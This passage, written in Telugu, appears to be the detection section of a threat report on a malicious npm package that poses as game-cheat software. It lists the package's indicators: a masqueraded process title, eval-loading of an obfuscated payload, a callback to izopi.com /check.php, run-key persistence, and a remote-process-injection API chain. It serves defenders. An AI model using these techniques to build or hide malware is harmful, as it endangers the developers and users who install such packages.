- Node.js ప్రాసెస్పై హెచ్చరిక, దీని ప్రాసెస్ టైటిల్ 'రన్టైమ్ బ్రోకర్'గా ఉంది. అసలైన బ్రోకర్ RuntimeBroker.exe, అంతేగాని Node రన్టైమ్ కాదు.
- కంపైల్ చేయబడిన .node యాడ్ఆన్తో పాటు, దాని పక్కనే ఉన్న .obf.js ఫైల్ యొక్క eval(fs.readFileSync(…))ను కూడా అందించే ప్యాకేజీలను npm install-timeలో ఫెచ్ చేయడాన్ని ఫ్లాగ్ చేయండి. అస్పష్టమైన నేటివ్ బైనరీ పక్కన అస్పష్టంగా మార్చబడిన టెక్స్ట్ పేలోడ్ లోడ్ అవ్వడమే ఇక్కడి నిర్మాణపరమైన సూచన, ఇది ఏ స్ట్రింగ్ IOCతో సంబంధం లేకుండా ఉంటుంది.
- నిర్వహించబడే విండోస్ ఎండ్పాయింట్లలో, ఊహించని నోడ్ ప్రాసెస్ ద్వారా పోర్ట్ 3000లో ప్రారంభించబడిన ఏదైనా స్థానికంగా బౌండ్ చేయబడిన లిజనర్ను అనుమానాస్పదంగా పరిగణించండి.
- డెవలపర్ లేదా తుది-వినియోగదారు హోస్ట్ల నుండి izopi.comకు వెళ్లే అభ్యర్థనలను నిరోధించండి లేదా హెచ్చరించండి; ఇది ప్యాకేజీ యొక్క ఏకైక బాహ్య ఎండ్పాయింట్, దీనిని అస్పష్ట సర్వర్ నుండి /check.php వద్ద చేరుకోవచ్చు.
- బండిల్ చేయబడిన ఏ .node యాడ్ఆన్నైనా విశ్వసించే ముందు, దాని ఇంపోర్ట్ టేబుల్ను తనిఖీ చేయండి. ప్యాకేజీ ఏమి చేస్తుందని చెప్పుకున్నప్పటికీ, OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread అనే ఈ కలయిక రిమోట్-ప్రాసెస్ ఇంజెక్షన్ అవుతుంది; ఇక్కడ ఇది ఒక Direct3D ఓవర్లే మరియు aimbot/ESP/triggerbot స్ట్రింగ్ల పక్కన ఉంటుంది.
స్థిర-విశ్లేషణ కోసం pipelineవెర్షన్ మార్పులన్నింటిలోనూ ఈ నిర్ధారణ రూపం స్థిరంగా ఉంటుంది: నెట్వర్క్-యేతర ఇన్స్టాల్ ప్రొఫైల్, తెలిసిన సిస్టమ్-ప్రాసెస్ పేరుకు ప్రాసెస్-టైటిల్ కేటాయింపు, పవర్షెల్ ద్వారా రన్-కీ రైట్, మరియు డిస్క్ నుండి చదివిన ఫైల్ యొక్క ఇవాల్యుయేషన్. వీటిలో ఏవీ డొమైన్, IP, లేదా తదుపరి రీపబ్లిష్ ద్వారా తొలగించబడే వెర్షన్ నంబర్పై ఆధారపడవు.
ప్రస్తావనలు
[npm: సున్నితత్వం] – ఇక్కడ చర్చించిన ప్యాకేజీ వెర్షన్ లైన్ కోసం రిజిస్ట్రీ పేజీ; తొలగింపుకు లోబడి ఉంటుంది.





